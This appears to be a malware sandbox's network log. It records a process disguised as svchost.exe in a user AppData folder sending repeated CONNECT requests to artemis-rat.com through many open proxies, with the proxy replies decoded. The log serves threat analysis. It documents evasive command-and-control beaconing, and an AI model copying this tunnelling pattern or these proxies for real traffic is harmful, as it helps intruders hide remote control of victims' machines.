Mar 9, 2024 13:14:30.733989954 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2549	192.168.2.5	58532	202.159.35.153	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.735546112 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2550	192.168.2.5	58535	202.159.35.153	443	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.736737013 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2551	192.168.2.5	58329	103.23.100.1	4145	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.742144108 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2552	192.168.2.5	58374	103.113.71.230	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.747987986 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.567514896 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.546503067 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:34.380662918 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:36.101062059 CET	39	IN	HTTP/1.0 200 Connection established

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2553	192.168.2.5	58326	8.222.164.205	15673	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.755635023 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2554	192.168.2.5	58278	122.114.232.137	808	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.801714897 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2555	192.168.2.5	55401	148.72.206.84	2536	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.802691936 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:35.646287918 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2556	192.168.2.5	58385	91.189.177.190	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.802699089 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.122859955 CET	1286	IN	HTTP/1.1 403 Forbidden Server: squid/5.7 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:30 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3628 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en X-Cache: MISS from lb1 X-Cache-Lookup: NONE from lb1:3128 Via: 1.1 lb1 (squid/5.7) Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 0a 68 74 6d 6c 20 62 6f 64 79 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2020 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-serif;}html body {margin: 0;padding: 0;background

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2557	192.168.2.5	58402	185.225.232.191	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.807481050 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.123697996 CET	805	IN	HTTP/1.1 500 Internal Server Error Date: Sat, 09 Mar 2024 12:14:30 GMT Server: Apache/2.4.57 (Debian) Content-Length: 613 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.57 (Debian) Server at artemis-rat.com Port 443</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2558	192.168.2.5	55479	132.148.245.112	38117	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.809542894 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2559	192.168.2.5	58355	43.128.107.251	8888	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.816438913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.183969975 CET	327	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:31 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2560	192.168.2.5	58330	193.151.130.114	8086	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.819837093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2561	192.168.2.5	58419	39.105.27.30	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.820204020 CET	193	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com
Mar 9, 2024 13:14:31.151813030 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2562	192.168.2.5	58412	120.78.191.68	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.820369005 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.160962105 CET	767	IN	HTTP/1.1 403 Forbidden Server: Beaver Cache-Control: no-cache Content-Type: text/html Content-Length: 635 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2563	192.168.2.5	58436	15.236.106.236	3128	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.820733070 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.117916107 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:30 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2564	192.168.2.5	58122	117.160.250.163	9999	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.820966005 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:31.419142008 CET	221	IN	HTTP/1.1 403 Access Denied Date: Sat, 09 Mar 2024 12:14:31 GMT Connection: close Cache-Control: no-store Content-Type: text/html Content-Language: en Content-Length: 43 Data Raw: 59 6f 75 20 61 72 65 20 6e 6f 74 20 61 6c 6c 6f 77 65 64 20 74 6f 20 61 63 63 65 73 73 20 74 68 65 20 64 6f 63 75 6d 65 6e 74 2e Data Ascii: You are not allowed to access the document.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2565	192.168.2.5	57039	185.49.30.5	8081	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.821439028 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2566	192.168.2.5	58324	90.188.250.16	80	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.827162981 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2567	192.168.2.5	58468	192.154.244.92	9000	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:30.833694935 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

